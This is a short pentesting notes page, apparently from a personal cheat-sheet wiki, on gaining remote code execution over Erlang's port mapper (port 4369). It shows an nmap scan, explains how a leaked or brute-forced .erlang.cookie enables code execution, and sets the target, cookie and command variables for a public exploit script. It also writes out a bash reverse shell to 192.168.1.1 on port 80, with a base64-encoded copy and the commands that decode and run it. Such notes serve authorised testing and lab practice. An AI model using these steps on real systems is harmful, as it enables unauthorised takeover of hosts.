Erlang - 4369

Erlang Cookie RCE

https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd

nmap -sV -Pn -n -T4 -p 4369 --script epmd-info 192.168.1.2

4369/tcp  open   epmd       Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 65000
65000/tcp open   unknown

If you can leak the Authentication cookie you will be able to execute code on the host. Usually, this cookie is located in ~/.erlang.cookie and is generated by erlang at the first start.

There is a epmd port. And rabbit service on 65000 port. We need to rce we need erlang.cookie value. We can brute force it or we can find it via another services on the host.

.erlang.cookie
JFKERIPLFKVJSQRDIXJS

https://www.exploit-db.com/exploits/49418

$ python3 49418

We need to change relevant parts of the code.

TARGET = "192.168.1.2"
PORT = 65000
COOKIE = "JFKERIPLFKVJSQRDIXJS"
CMD = "id"

/bin/bash -i >& /dev/tcp/192.168.1.1/80 0>&1 - Base64 encoded

CMD="echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xLzgwIDA+JjE= | base64 -d > shell.sh"
CMD="bash shell.sh"

PreviousPostgres Nextrsync - 873

Last updated 2 years ago